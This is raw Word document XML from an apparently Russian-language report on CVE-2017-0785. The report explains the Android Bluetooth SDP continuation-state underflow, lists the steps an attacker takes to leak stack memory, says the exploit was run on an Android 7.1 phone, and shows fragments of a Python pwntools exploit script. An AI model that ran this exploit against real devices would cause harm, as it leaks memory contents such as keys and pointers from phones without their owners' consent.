        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidR="007B67FD" w:rsidRPr="007B67FD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="007B67FD">
      <w:pPr>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="38" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="40" w:firstLine="811"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rem_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>num_rsp_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cont_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRPr="00E513F3" w:rsidRDefault="007B67FD" w:rsidP="007B67FD">
      <w:pPr>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="38" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="40" w:firstLine="811"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">В коде предполагается, что </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> относятся к одному и тому же ответу, который отправляется в фрагменты. Из-за путаницы с индуцированным</w:t>
      </w:r>
      <w:r>
        <w:t>(вызванным)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> состоянием, так как </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>16_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">, теперь код потребует очень большой отклик (до 64 КБ) - и последующий цикл цикла будет скопирован за пределы байтов из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> в пакет исходящего ответа </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">Подводя итог, эта утечка информации может быть вызвана злоумышленником в этом </w:t>
      </w:r>
      <w:r w:rsidR="007B67FD">
        <w:t>порядке</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>Запрос поиска выполняется для некоторой службы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>В связи с этим запросом возвращается ответ с состоянием продолжения. Размер этого ответа будет определяться MTU соединения, как показано в выдержке кода выше, поэтому злоумышленник также контролирует размер фрагментов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>Второй запрос выполняется для другой службы, и состояние продолжения из предыдущего ответа будет добавлено к этому запросу. Этот второй запрос поиска будет иметь сервис, который будет возвращать меньший размер ответа, чем предыдущий ответ, - и это приведет к описанной путанице состояний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">Будет предпринята попытка проверки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>cont_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">, но она пройдет успешно (поскольку к второму запросу был добавлен тот же самый </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>cont_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">В силу того факта, что </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>num_rsp_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve"> в этом втором запросе меньше, чем тот, который указан в первом запросе, будет достигнуто </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>недополнение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>underflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>rem_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">Теперь код будет считать, что требуется очень большой отклик - и следующий цикл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>for-loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve"> будет копировать байты из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>rsp_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve"> в пакет исходящего ответа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">С этого момента злоумышленник может повторить отправку одного и того же запроса и добавит возвращаемый </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>cont_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve"> - продолжая читать все больше и больше из связанных байтов из</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>rsp_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:r w:rsidRPr="00EE21FF">
        <w:t xml:space="preserve">Подобно уязвимости утечки информации в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>BlueZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>, эта уязвимость может привести к раскрытию значительной части памяти - в этом случае из стека процессов. Эти данные могут потенциально включать ключи шифрования, адресное пространство и ценные указатели (кода или данных), которые могут использоваться для обхода ASLR при использовании уязвимости при разрыве памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRPr="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="00685E0E">
      <w:r>
        <w:t xml:space="preserve">Выполнив данный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>эксплоита</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> над </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>сматрфоном</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> на базе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> 7.1 </w:t>
      </w:r>
      <w:r>
        <w:t>были получены некоторые данные .(Рисунок 15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058135C" w:rsidRDefault="003F5C29" w:rsidP="00C45AEF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6587B880" wp14:editId="73BEF6A0">
            <wp:extent cx="5940425" cy="779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790180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEF" w:rsidRDefault="007B67FD" w:rsidP="007B67FD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 15 – работа эксплоита</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRDefault="00CA6DC7" w:rsidP="00C45AEF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>эксплоита</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> написан на языке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">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FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</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FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'TARGET'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</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r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>log.info(</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX"</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</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r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>exit()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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">target = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'TARGET'</w:t>
      </w:r>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service_long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
